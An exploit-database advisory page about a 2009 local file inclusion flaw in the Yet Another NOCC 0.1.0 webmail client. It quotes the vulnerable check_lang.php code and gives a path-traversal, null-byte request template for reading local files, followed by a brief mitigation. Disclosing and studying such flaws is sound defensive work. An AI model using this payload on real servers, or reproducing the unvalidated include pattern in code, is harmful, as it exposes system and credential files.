header-logo
Suggest Exploit
vendor:
NOCC
by:
Kacper
7.5
CVSS
HIGH
Local File Inclusion
22
CWE
Product Name: NOCC
Affected Version From: 0.1.0
Affected Version To: 0.1.0
Patch Exists: YES
Related CWE: N/A
CPE: a:nocc:nocc:0.1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Yet Another NOCC 0.1.0 <= Local File Inclusion Vulnerabilities

YANOCC is a simple and fast webmail client which can handle POP3, SMTP, and IMAP servers. YANOCC is based on NOCC's code and is written with PHP4. It features multi-language support, MIME attachments, displays HTML messages, address book, folder support. In file check_lang.php, if the $lang variable is not set, it will take the value of the $HTTP_ACCEPT_LANGUAGE variable and check if the file exists in the lang directory. If the file does not exist, it will set the $lang variable to the default language. This can be exploited to include arbitrary local files by passing a relative path in the lang parameter.

Mitigation:

Ensure that user-supplied input is properly validated and sanitized before being used in the application.
Source

Exploit-DB raw data:

Yet Another NOCC 0.1.0 <= Local File Inclusion Vulnerabilities

YANOCC is a simple and fast webmail client which can handle POP3, SMTP, and IMAP servers. 
YANOCC is based on NOCC's code and is written with PHP4. It features multi-language support, 
MIME attachments, displays HTML messages, address book, folder support.

Author: Kacper
HomePage: http://devilteam.pl/
          http://polskihacking.pl/

in file check_lang.php:

if (!ISSET($lang))
{
	$ar_lang = explode(",", $HTTP_ACCEPT_LANGUAGE);
	while ($accept_lang = array_shift($ar_lang))
	{
		$tmp = explode(";", $accept_lang);
		$tmp[0] = strtolower($tmp[0]);
		if (file_exists("lang/".$tmp[0].".php"))
		{
			$lang = $tmp[0];
			break;
		}
	}
	if ($lang == "")
		$lang = $default_lang;
}
//  Fix for faulty PHP install (RH7, see bug #24933)
$lang = trim($lang);
require ("lang/".$lang.".php");

Vuln example:

check_lang.php?lang=../[localinclude]%00


# milw0rm.com [2009-02-09]

Navigation

Suggest Exploit

Services By CQR